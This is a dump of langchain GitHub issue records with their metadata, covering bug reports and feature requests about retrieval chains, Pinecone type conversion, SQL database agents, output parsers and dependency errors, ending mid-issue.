packaging==23.1
pandas==2.0.3
pdf2image==1.16.3
pdfminer.six==20221105
Pillow==10.0.0
posthog==3.0.1
protobuf==4.23.4
pulsar-client==3.2.0
pycparser==2.21
pydantic==1.9.0
pypandoc==1.11
python-dateutil==2.8.2
python-docx==0.8.11
python-dotenv==1.0.0
python-magic==0.4.27
python-pptx==0.6.21
pytz==2023.3
PyYAML==6.0
regex==2023.6.3
requests==2.31.0
six==1.16.0
sniffio==1.3.0
SQLAlchemy==2.0.18
starlette==0.20.4
sympy==1.12
tabulate==0.9.0
tenacity==8.2.2
tiktoken==0.4.0
tokenizers==0.13.3
tqdm==4.65.0
typing-inspect==0.9.0
typing_extensions==4.7.1
tzdata==2023.3
unstructured==0.8.1
urllib3==2.0.3
uvicorn==0.22.0
uvloop==0.17.0
watchfiles==0.19.0
websockets==11.0.3
xlrd==2.0.1
XlsxWriter==3.1.2
yarl==1.9.2
zipp==3.16.0
zstandard==0.21.0
```
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Run this code sample
https://github.com/techleadhd/chatgpt-retrieval
### Expected behavior
Pydantic validation fails: TypeError: issubclass() arg 1 must be a class | BaseEmbaasLoader validation fails | https://api.github.com/repos/langchain-ai/langchain/issues/7609/comments | 3 | 2023-07-12T19:38:41Z | 2023-07-13T07:50:31Z | https://github.com/langchain-ai/langchain/issues/7609 | 1,801,636,599 | 7,609 |
[
"hwchase17",
"langchain"
]
| ### System Info
langchain==0.0.170
openai==0.27.4
python
windows
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [X] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [X] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [X] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
I am using the "**ConversationalRetrievalChain**", Whenever I send a message to a model, it produces wrong results with history, whereas if I send the same message without history, it produces correct results. The issue here is that the model is forming the wrong standalone question, and the same wrong standalone question is passing to the OpenAI Model.
Steps to reproduce:
1. Use the Conversational Retrieval Chan
2. Pass the history on to the chain.
3. Send the "Hello" message continuously.
Here you can observe wrong/weired answers.
The above scenario is Just an example. But whenever we ask some question, immediately if we send the message "Hello", the "conversational retrieval chain" forms the wrong standalone question, hence the openAI model producing wrong answers.
This is the code I am using: -
_template = """
Use the following pieces of context to answer the question at the end.
{context}
If you still cant find the answer, just say that you don't know, don't try to make up an answer.
You can also look into chat history.
{chat_history}
Question: {question}
Answer:
"""
CONDENSE_QUESTION_PROMPT = PromptTemplate(
template=_template,
input_variables = ["context","question", "chat_history"],
)
chain = ConversationalRetrievalChain.from_llm(
llm= azure_chat_api_llm_objct,
retriever=vectors.as_retriever(),
verbose=True,
chain_type="stuff",
memory = memory,
get_chat_history=lambda h:h,
# condense_question_prompt=CONDENSE_QUESTION_PROMPT,
combine_docs_chain_kwargs={"prompt": CONDENSE_QUESTION_PROMPT},
return_generated_question=True,
)
chain.run("Hello")
Note:- I have tried multiple way like removing "CONDENCE_QUESTION", without prompt, with different types of prompts, etc..but still its producing wrong standalone question.
Ex:-
_template = """
Given the following conversation and a follow up question, rephrase the follow up question to be a standalone question.
Chat History:
{chat_history}
Follow Up Input: {question}
Standalone question:
"""
Thanks in advance, and please correct me if I made any mistakes in the code.
<img width="458" alt="image" src="https://github.com/hwchase17/langchain/assets/52491904/eb0e3aba-6151-42f8-924b-bda2cb4ccfaf">
### Expected behavior
It should form a proper standalone question when we pass history before passing to model. | If we continuously send "Hello" messages to the "conversational retrieval chain," the model produces weired/wrong answers. | https://api.github.com/repos/langchain-ai/langchain/issues/7606/comments | 9 | 2023-07-12T18:25:59Z | 2024-01-05T13:06:23Z | https://github.com/langchain-ai/langchain/issues/7606 | 1,801,539,064 | 7,606 |
[
"hwchase17",
"langchain"
]
| ### System Info
langchain==0.0.206 ; python_version >= "3.11" and python_version < "4.0"
langchainplus-sdk==0.0.16 ; python_version >= "3.11" and python_version < "4.0"
### Who can help?
@hwaking @agola11 Hey Guys! The pinecone wrapper is doing a weird auto-type conversion and its thinking my string ID values are dates in this part of the code:
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Have a string value set as your Pinecone Document.pagecontent that could be misinterpreted as a date ex: 21070809
Problem function:
def similarity_search_with_score(
self,
query: str,
k: int = 4,
filter: Optional[dict] = None,
namespace: Optional[str] = None,
) -> List[Tuple[Document, float]]:
"""Return pinecone documents most similar to query, along with scores.
Args:
query: Text to look up documents similar to.
k: Number of Documents to return. Defaults to 4.
filter: Dictionary of argument(s) to filter on metadata
namespace: Namespace to search in. Default will search in '' namespace.
Returns:
List of Documents most similar to the query and score for each
"""
if namespace is None:
namespace = self._namespace
query_obj = self._embedding_function(query)
docs = []
results = self._index.query(
[query_obj],
top_k=k,
include_metadata=True,
namespace=namespace,
filter=filter,
)
for res in results["matches"]:
metadata = res["metadata"]
if self._text_key in metadata:
text = metadata.pop(self._text_key)
score = res["score"]
# if (type(text) != str): <-------------------------- I added this code to convert it back to string
# text = text.strftime("%Y%m%d") <------------- If you can just recast to string the problem will resolve
docs.append((Document(page_content=text, metadata=metadata), score))
else:
logger.warning(
f"Found document with no `{self._text_key}` key. Skipping."
)
return docs
Stack: [langchain] [2023-07-12 17:43:08] File "/workspace/.heroku/python/lib/python3.11/site-packages/uvicorn/protocols/http/h11_impl.py", line 428, in run_asgi
[langchain] [2023-07-12 17:43:08] result = await app( # type: ignore[func-returns-value]
[langchain] [2023-07-12 17:43:08] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
[langchain] [2023-07-12 17:43:08] File "/workspace/.heroku/python/lib/python3.11/site-packages/uvicorn/middleware/proxy_headers.py", line 78, in __call__
[langchain] [2023-07-12 17:43:08] return await self.app(scope, receive, send)
[langchain] [2023-07-12 17:43:08] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
[langchain] [2023-07-12 17:43:08] File "/workspace/.heroku/python/lib/python3.11/site-packages/fastapi/applications.py", line 282, in __call__
[langchain] [2023-07-12 17:43:08] await super().__call__(scope, receive, send)
[langchain] [2023-07-12 17:43:08] File "/workspace/.heroku/python/lib/python3.11/site-packages/sentry_sdk/integrations/starlette.py", line 348, in _sentry_patched_asgi_app
[langchain] [2023-07-12 17:43:08] return await middleware(scope, receive, send)
[langchain] [2023-07-12 17:43:08] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
[langchain] [2023-07-12 17:43:08] File "/workspace/.heroku/python/lib/python3.11/site-packages/sentry_sdk/integrations/asgi.py", line 141, in _run_asgi3
[langchain] [2023-07-12 17:43:08] return await self._run_app(scope, lambda: self.app(scope, receive, send))
[langchain] [2023-07-12 17:43:08] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
[langchain] [2023-07-12 17:43:08] File "/workspace/.heroku/python/lib/python3.11/site-packages/sentry_sdk/integrations/asgi.py", line 190, in _run_app
[langchain] [2023-07-12 17:43:08] raise exc from None
[langchain] [2023-07-12 17:43:08] File "/workspace/.heroku/python/lib/python3.11/site-packages/sentry_sdk/integrations/asgi.py", line 185, in _run_app
[langchain] [2023-07-12 17:43:08] return await callback()
[langchain] [2023-07-12 17:43:08] ^^^^^^^^^^^^^^^^
[langchain] [2023-07-12 17:43:08] File "/workspace/.heroku/python/lib/python3.11/site-packages/starlette/applications.py", line 122, in __call__
[langchain] [2023-07-12 17:43:08] await self.middleware_stack(scope, receive, send)
[langchain] [2023-07-12 17:43:08] File "/workspace/.heroku/python/lib/python3.11/site-packages/sentry_sdk/integrations/starlette.py", line 143, in _create_span_call
[langchain] [2023-07-12 17:43:08] return await old_call(app, scope, new_receive, new_send, **kwargs)
[langchain] [2023-07-12 17:43:08] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
[langchain] [2023-07-12 17:43:08] File "/workspace/.heroku/python/lib/python3.11/site-packages/starlette/middleware/errors.py", line 184, in __call__
[langchain] [2023-07-12 17:43:08] raise exc
[langchain] [2023-07-12 17:43:08] File "/workspace/.heroku/python/lib/python3.11/site-packages/starlette/middleware/errors.py", line 162, in __call__
[langchain] [2023-07-12 17:43:08] await self.app(scope, receive, _send)
[langchain] [2023-07-12 17:43:08] File "/workspace/.heroku/python/lib/python3.11/site-packages/sentry_sdk/integrations/starlette.py", line 242, in _sentry_exceptionmiddleware_call
[langchain] [2023-07-12 17:43:08] await old_call(self, scope, receive, send)
[langchain] [2023-07-12 17:43:08] File "/workspace/.heroku/python/lib/python3.11/site-packages/sentry_sdk/integrations/starlette.py", line 143, in _create_span_call
[langchain] [2023-07-12 17:43:08] return await old_call(app, scope, new_receive, new_send, **kwargs)
[langchain] [2023-07-12 17:43:08] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
[langchain] [2023-07-12 17:43:08] File "/workspace/.heroku/python/lib/python3.11/site-packages/starlette/middleware/exceptions.py", line 79, in __call__
[langchain] [2023-07-12 17:43:08] raise exc
[langchain] [2023-07-12 17:43:08] File "/workspace/.heroku/python/lib/python3.11/site-packages/starlette/middleware/exceptions.py", line 68, in __call__
[langchain] [2023-07-12 17:43:08] await self.app(scope, receive, sender)
[langchain] [2023-07-12 17:43:08] File "/workspace/.heroku/python/lib/python3.11/site-packages/sentry_sdk/integrations/starlette.py", line 143, in _create_span_call
[langchain] [2023-07-12 17:43:08] return await old_call(app, scope, new_receive, new_send, **kwargs)
[langchain] [2023-07-12 17:43:08] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
[langchain] [2023-07-12 17:43:08] File "/workspace/.heroku/python/lib/python3.11/site-packages/fastapi/middleware/asyncexitstack.py", line 20, in __call__
[langchain] [2023-07-12 17:43:08] raise e
[langchain] [2023-07-12 17:43:08] File "/workspace/.heroku/python/lib/python3.11/site-packages/fastapi/middleware/asyncexitstack.py", line 17, in __call__
[langchain] [2023-07-12 17:43:08] await self.app(scope, receive, send)
[langchain] [2023-07-12 17:43:08] File "/workspace/.heroku/python/lib/python3.11/site-packages/starlette/routing.py", line 718, in __call__
[langchain] [2023-07-12 17:43:08] await route.handle(scope, receive, send)
[langchain] [2023-07-12 17:43:08] File "/workspace/.heroku/python/lib/python3.11/site-packages/starlette/routing.py", line 276, in handle
[langchain] [2023-07-12 17:43:08] await self.app(scope, receive, send)
[langchain] [2023-07-12 17:43:08] File "/workspace/.heroku/python/lib/python3.11/site-packages/starlette/routing.py", line 66, in app
[langchain] [2023-07-12 17:43:08] response = await func(request)
[langchain] [2023-07-12 17:43:08] ^^^^^^^^^^^^^^^^^^^
[langchain] [2023-07-12 17:43:08] File "/workspace/.heroku/python/lib/python3.11/site-packages/sentry_sdk/integrations/fastapi.py", line 131, in _sentry_app
[langchain] [2023-07-12 17:43:08] return await old_app(*args, **kwargs)
[langchain] [2023-07-12 17:43:08] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
[langchain] [2023-07-12 17:43:08] File "/workspace/.heroku/python/lib/python3.11/site-packages/fastapi/routing.py", line 241, in app
[langchain] [2023-07-12 17:43:08] raw_response = await run_endpoint_function(
[langchain] [2023-07-12 17:43:08] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
[langchain] [2023-07-12 17:43:08] File "/workspace/.heroku/python/lib/python3.11/site-packages/fastapi/routing.py", line 167, in run_endpoint_function
[langchain] [2023-07-12 17:43:08] return await dependant.call(**values)
[langchain] [2023-07-12 17:43:08] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
[langchain] [2023-07-12 17:43:08] File "/workspace/search.py", line 528, in ask_question_0_gateway
[langchain] [2023-07-12 17:43:08] return await ask_question_0(question, user)
[langchain] [2023-07-12 17:43:08] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
[langchain] [2023-07-12 17:43:08] File "/workspace/search.py", line 282, in ask_question_0
[langchain] [2023-07-12 17:43:08] response = await pinecone_search(question, metadata_filter)
[langchain] [2023-07-12 17:43:08] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
[langchain] [2023-07-12 17:43:08] File "/workspace/search.py", line 274, in pinecone_search
[langchain] [2023-07-12 17:43:08] return pine.similarity_search_with_score(query=question, k=k, filter=filter)
[langchain] [2023-07-12 17:43:08] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
[langchain] [2023-07-12 17:43:08] File "/workspace/.heroku/python/lib/python3.11/site-packages/langchain/vectorstores/pinecone.py", line 132, in similarity_search_with_score
[langchain] [2023-07-12 17:43:08] docs.append((Document(page_content=text, metadata=metadata), score))
[langchain] [2023-07-12 17:43:08] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
[langchain] [2023-07-12 17:43:08] File "/workspace/.heroku/python/lib/python3.11/site-packages/langchain/load/serializable.py", line 64, in __init__
[langchain] [2023-07-12 17:43:08] super().__init__(**kwargs)
[langchain] [2023-07-12 17:43:08] File "pydantic/main.py", line 341, in pydantic.main.BaseModel.__init__
[langchain] [2023-07-12 17:43:08] raise validation_error
[langchain] [2023-07-12 17:43:08] pydantic.error_wrappers.ValidationError: 1 validation error for Document
[langchain] [2023-07-12 17:43:08] page_content
[langchain] [2023-07-12 17:43:08] str type expected (type=type_error.str)
### Expected behavior
I would expect my data from Pinecone to comeback to my API exactly how I put it there. Remove the auto-conversion or implement a strict string type casting to ensure no auto-typing. | Type Error Langchain auto converting string to date.timestamp in Pinecone similarity search when Document pagecontent value is a string that "could" be a date ex: 21070926 | https://api.github.com/repos/langchain-ai/langchain/issues/7605/comments | 2 | 2023-07-12T18:01:54Z | 2023-10-18T16:05:43Z | https://github.com/langchain-ai/langchain/issues/7605 | 1,801,502,750 | 7,605 |
[
"hwchase17",
"langchain"
]
| ### Feature request
Add support for Meilisearch vector search.
[Meilisearch](https://www.meilisearch.com) is an open-source search engine. See [documentation](https://www.meilisearch.com/docs)
### Motivation
Meilisearch is releasing the vector search/store feature, which should be available from July 31st.
### Your contribution
I'm working on it and will submit a PR for this issue soon. | Add support for Meilisearch vector databases | https://api.github.com/repos/langchain-ai/langchain/issues/7603/comments | 3 | 2023-07-12T15:32:23Z | 2023-07-29T00:06:55Z | https://github.com/langchain-ai/langchain/issues/7603 | 1,801,241,754 | 7,603 |
[
"hwchase17",
"langchain"
]
| ### System Info
Python: 3.10.11
LangChain: 0.0.229
SO: Windows, Linux Ubuntu and Mac
Hi people,
I'm using **ConversationalRetrievalChain** without any modifications, and in 90% of the cases, it responds by repeating words and entire phrases, like in the examples below:
Questions about Duna book:
**How did Muad'Dib die?**
Muad'Dib died of old age. **No, Muad'Dib did not die of old age**. The passage mentions that the death of Muad'Dib will be followed by the moral suicide of all men, suggesting that his death was not natural. However, the exact cause of his death is not specified in the text. No, Muad'Dib did not die of old age. The passage mentions that the death of Muad'Dib will be followed by the moral suicide of all men, suggesting that his death was not natural. **However, the exact cause of his death is not specified in the text**.
**Was Paul Atreides powerful?**
**Was Paul Atreides powerful? Yes, Paul Atreides was powerful**. He possessed oracle-like abilities and special powers that placed him beyond the usual limits of time and space. Additionally, he was a charismatic leader and skilled strategist, capable of commanding armies and achieving victories. His strength and power were recognized by the emperor and other characters in the book. Yes, Paul Atreides was powerful. **He possessed oracle-like abilities and special powers that placed him beyond the usual limits of time and space. Additionally, he was a charismatic leader and skilled strategist, capable of commanding armies and achieving victories. His strength and power were recognized by the emperor and other characters in the book.**
**PLEASE, Does anyone know about this issue?**
I have repeated several tutorials that I found on the internet, and this always happens. But strangely, I don't see anyone complaining about it in the forums, so I must be doing something wrong.
**This is the code I am using:**
llm = ChatOpenAI(model_name=app_params.Model,
temperature=0,
openai_api_key=app_keys.OPENAI_API_KEY,
**streaming=True,**
verbose=True,
callbacks=[WebSocketCallbackHandler(websocket)]
)
memory = ConversationBufferWindowMemory(memory_key='chat_history', output_key='answer', chat_memory=chat_history, return_messages=True, k=3, verbose=True)
qna = ConversationalRetrievalChain.from_llm(
llm=llm,
chain_type="stuff",
retriever=retriever,
verbose=True,
memory=memory,
)
#async
result = **await qna.acall**({"question": query})
**I would be very glad for any help!
Best regards,
Marcos.**
Hi, @hwchase17, I appreciate your help.
### Who can help?
Hi, @hwchase17, I appreciate your help.
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [X] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
**This is the code I am using:**
llm = ChatOpenAI(model_name=app_params.Model,
temperature=0,
openai_api_key=app_keys.OPENAI_API_KEY,
**streaming=True,**
verbose=True,
callbacks=[WebSocketCallbackHandler(websocket)]
)
memory = ConversationBufferWindowMemory(memory_key='chat_history', output_key='answer', chat_memory=chat_history, return_messages=True, k=3, verbose=True)
qna = ConversationalRetrievalChain.from_llm(
llm=llm,
chain_type="stuff",
retriever=retriever,
verbose=True,
memory=memory,
)
**#async**
result = **await qna.acall**({"question": query})
### Expected behavior
I hope the answer provided by ConversationalRetrievalChain makes sense and does not contain repetitions of the question or entire phrases. | ConversationalRetrievalChain with streaming=True => responds by repeating words and phrases | https://api.github.com/repos/langchain-ai/langchain/issues/7599/comments | 10 | 2023-07-12T13:46:03Z | 2024-05-06T16:05:34Z | https://github.com/langchain-ai/langchain/issues/7599 | 1,801,022,338 | 7,599 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
I'd like to understand if there is a way to have from OpenAI response a **list of values** (string or objects: it's the same) of a **fixed length**. I read the documentation here: https://python.langchain.com/docs/modules/model_io/output_parsers/comma_separated but I didn't find anything related to a length (maybe it's not possible?). Indeed I understood that probably these parsers only add a well-formatted piece of prompt, but you don't have the safety to have the expected results.
In my use case, I have a list of texts and I want to have a title on each of them. My prompt is something like that:
```
####
Text 1:
- Bla bla bla
...
Text 8:
- Bla bla bla
###
Use these texts to generate a title for each text. The number of the titles must be 8.
```
At the end of the prompt I "force" the number to the number of the expected results with the same number of the text, but sometimes the model gives me more titles (above all when the number of texts is 1).
So I thought to use these parsers. But I don't find any constraints on the length of the results, the only thing is a validator to check if the length is correct.
### Suggestion:
_No response_ | Output parser set number of list result | https://api.github.com/repos/langchain-ai/langchain/issues/7598/comments | 3 | 2023-07-12T13:31:51Z | 2023-10-19T16:06:03Z | https://github.com/langchain-ai/langchain/issues/7598 | 1,800,994,485 | 7,598 |
[
"hwchase17",
"langchain"
]
| ### Feature request
Hello Langchain community!
I'm currently in the process of developing a company's chatbot, and I've chosen to use both a CSV file and Pinecone DB for the project.
Here's a basic outline of the structure I've adopted so far:

I've managed to set the two tools, and its example usage has been providing accurate answers

the first tool gets me the answers based on pandas’s result from the example usage, the answers are based on csv and it’s correct in all cases

Also set the second tool and its example usage is answered correctly.

until here things are very promising and i expected everything to work as it is.
so i have set the LLM and combined the two tools and used agent

However, when I combined both tools using an agent, the answers started to deviate from the expected output. I'm not entirely sure whether the method I'm using to utilize the agent is optimal.

To address this issue, I've experimented with the MultiretrievalQA chain using vector embedding. But the results are not consistently reliable, and moreover, I'd rather not generate new embeddings every time I modify the CSV.
Is there anyone in the community who can shed light on these issues I'm encountering? Any feedback on my current approach, suggestions on how to optimize it, or alternative strategies would be greatly appreciated!
Thank you.
### Motivation
I'm making a company's gpt and i hope to link my csv with the chatbot so that whenever i change the csv the chatbot is automatically linked with it
### Your contribution
um solving the problem would help others? | Question!! Multiple agent use? agent within agent? | https://api.github.com/repos/langchain-ai/langchain/issues/7597/comments | 6 | 2023-07-12T13:10:59Z | 2024-03-20T16:05:08Z | https://github.com/langchain-ai/langchain/issues/7597 | 1,800,955,601 | 7,597 |
[
"hwchase17",
"langchain"
]
| ### System Info
Langchain version: 0.0.230
python version: Python 3.9.12
### Who can help?
@hwchase17
@agola11
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [X] Agents / Agent Executors
- [X] Tools / Toolkits
- [X] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Im trying run the to code mentioned at: https://python.langchain.com/docs/modules/agents/toolkits/sql_database
But I'm getting the error as:
ModuleNotFoundError: No module named 'MySQLdb'
Then trying 'pip install MySQL-python' gives the following error:
ModuleNotFoundError: No module named 'ConfigParser'
Then trying 'pip install configparser' even doesn't solve the issue.
Please help me figure out this issue. Thanks!
### Expected behavior
The code should have just executed the prompt, And installation of the required libraries should be easier. | Error while trying to run SQL Database Agent example | https://api.github.com/repos/langchain-ai/langchain/issues/7594/comments | 3 | 2023-07-12T11:33:16Z | 2024-02-06T16:32:22Z | https://github.com/langchain-ai/langchain/issues/7594 | 1,800,783,109 | 7,594 |
[
"hwchase17",
"langchain"
]
| ### Feature request
In `VectorStore`/`VectorStoreRetriever` class, `_similarity_search_with_relevance_scores`function,
1) Allow different choices of threshold kind: allow users to choose whether >= threshold or <= threshold
2) Allow users to choose to return the relevance score along with the docs
### Motivation
I am working with returning relevant docs that satisfy a certain threshold, and I encountered some problems.
One problem is that for different embedding algorithms and similarity calculations, it is not always the case that higher relevance scores are better. Actually, when I use `HuggingFaceEmbedding` with `Chroma` database, the smaller the relevance score, the better. So I believe it would be necessary to allow users choose between different options here.
The second problem is that I want to see the relevance score, however, in https://github.com/hwchase17/langchain/blob/master/langchain/vectorstores/base.py, line 474 to 492, it is fixed that only the docs are finally returned.
```
def _get_relevant_documents(
self, query: str, *, run_manager: CallbackManagerForRetrieverRun
) -> List[Document]:
if self.search_type == "similarity":
docs = self.vectorstore.similarity_search(query, **self.search_kwargs)
elif self.search_type == "similarity_score_threshold":
docs_and_similarities = (
self.vectorstore.similarity_search_with_relevance_scores(
query, **self.search_kwargs
)
)
docs = [doc for doc, _ in docs_and_similarities]
elif self.search_type == "mmr":
docs = self.vectorstore.max_marginal_relevance_search(
query, **self.search_kwargs
)
else:
raise ValueError(f"search_type of {self.search_type} not allowed.")
return docs
```
I wish there is an option that the relevance scores could also be returned.
### Your contribution
I would love to open a PR if applicable ;) @hwchase17 | Improve the usage of relevance score threshold and allow the return of the scores | https://api.github.com/repos/langchain-ai/langchain/issues/7590/comments | 2 | 2023-07-12T09:38:17Z | 2023-10-18T16:05:52Z | https://github.com/langchain-ai/langchain/issues/7590 | 1,800,582,601 | 7,590 |
[
"hwchase17",
"langchain"
]
| ### System Info
I am using langchain v0.0.228. But namespace parameter is gone in existing_index() of v0.0.230.
Why the namespace is gone?
@hwchase17 @eyurtsev @agola11
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
No need.
### Expected behavior
should be used from_existing_index method with namespace parameter | namespace parameter is gone in pinecone from_existing_index method | https://api.github.com/repos/langchain-ai/langchain/issues/7589/comments | 2 | 2023-07-12T09:34:19Z | 2023-07-12T14:45:09Z | https://github.com/langchain-ai/langchain/issues/7589 | 1,800,575,762 | 7,589 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
if use ElasticVectorSearch as as_retriever and set the params:
```python
elastic_vector_search.as_retriever(search_type="similarity_score_threshold",
search_kwargs={"score_threshold": 1.8})
```
If no relevant docs were retrieved using the relevance score threshold 1.8.
then return an error!

### Suggestion:
it should not throw err, when there is no relevant docs.
it should response like "i don't know " or an openai default response. | Question:ConversationalRetrievalChain with retriever | https://api.github.com/repos/langchain-ai/langchain/issues/7588/comments | 1 | 2023-07-12T09:28:48Z | 2023-07-13T03:37:20Z | https://github.com/langchain-ai/langchain/issues/7588 | 1,800,566,204 | 7,588 |
[
"hwchase17",
"langchain"
]
| ### System Info
MacOS
Python 3.10.6
langchain 0.0.230
langchainplus-sdk 0.0.20
### Who can help?
@hwchase17 @agola11
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [X] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
For now, there are only the default `ConversationalChatAgent` and `ConversationalAgent`, and we cannot create custom prompt templates in them. At least, I don't see how to do that in both the docs and source code.
I think there should be a straight-forward way to do so, just like how you can have a [custom LLM agent](https://python.langchain.com/docs/modules/agents/how_to/custom_llm_chat_agent):
```py
agent = LLMSingleActionAgent(
llm_chain=llm_chain,
output_parser=output_parser,
stop=["\nObservation:"],
allowed_tools=tool_names
)
```
However, when the same code is applied to `ConversationalChatAgent`, that is:
```py
agent = LLMSingleActionAgent(
llm_chain=llm_chain,
output_parser=output_parser,
stop=["\nObservation:"],
allowed_tools=tool_names
)
```
I get the following error:
```shell
pydantic.error_wrappers.ValidationError: 1 validation error for ConversationalChatAgent
__root__
Got unexpected prompt type <class '__main__.CustomPromptTemplate'> (type=value_error)
```
I'm not sure if this belongs to **Bug Report** so if I'm doing anything wrong, please tell me about it. Thanks!
### Expected behavior
The agent should be created without errors. | Error when creating a custom ConversationalChatAgent | https://api.github.com/repos/langchain-ai/langchain/issues/7585/comments | 3 | 2023-07-12T08:21:47Z | 2024-01-19T07:28:12Z | https://github.com/langchain-ai/langchain/issues/7585 | 1,800,444,981 | 7,585 |
[
"hwchase17",
"langchain"
]
| ### Issue with current documentation:
Below code does not seem to work,
```
db = SQLDatabase.from_uri("mssql+pymssql://<some server>/<some db>",
include_tables=['Some table'], view_support=True)
db1 = SQLDatabase.from_uri("mssql+pymssql://<some other server>/<some other db>",
include_tables=['Some other table'], view_support=True)
toolkit = SQLDatabaseToolkit(db=db, llm=llm, reduce_k_below_max_tokens=True)
sql_agent_executor = create_sql_agent(
llm=llm,
toolkit=toolkit,
verbose=True
)
toolkit1 = SQLDatabaseToolkit(db=db1, llm=llm, reduce_k_below_max_tokens=True)
sql_agent_executor1 = create_sql_agent(
llm=llm,
toolkit=toolkit,
verbose=True
)
tools = [
Tool(
name = "Object or Product to Classification Association",
func=sql_agent_executor.run,
description="""
Useful for when you need to Query on database to find the object or product to classification association.
<user>: Get me top 3 records with Object number and description for approved classification KKK
<assistant>: I need to check Object or Product to Classification Association details.
<assistant>: Action: SQL Object or Product to Classification Association
<assistant>: Action Input: Check The Object or Product to Classification Association Table
"""
),
Tool(
name = "Authorization or Authority or License Database",
func=sql_agent_executor1.run,
description="""
Useful for when you need to Query on some thing else .
<user>: Get me top 2 Authority Records with LicenseNumber
<assistant>: I need to check Authorization or Authority or License Database details.
<assistant>: Action: SQL Authorization or Authority or License Database
<assistant>: Action Input: Check The Authorization or Authority or License Database Table
"""
)
]
```
Is there an example where we can configure multiple databases as different tools and query them. It seems possible, but in my case, what ever question I ask, it always goes to the first Tool. Not sure what is the problem.
### Idea or request for content:
_No response_ | DOC: Langchain works well with single database, but in a session if I have to work with multiple database, it does not seem working | https://api.github.com/repos/langchain-ai/langchain/issues/7581/comments | 10 | 2023-07-12T05:02:43Z | 2024-05-23T01:09:42Z | https://github.com/langchain-ai/langchain/issues/7581 | 1,800,186,972 | 7,581 |
[
"hwchase17",
"langchain"
]
| ### Why do I care about this issue?
MLflow also uses sqlalchemy to handle sqlite-based storage, and calls `sqlalchemy.orm.configure_mappers()` during initialization. With langchain>=0.0.228, MLflow fails to start. All MLflow users who choose sqlite-based storage cannot use it with langchain.
### System Info
langchain>=0.0.228
### Who can help?
@hwchase17
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
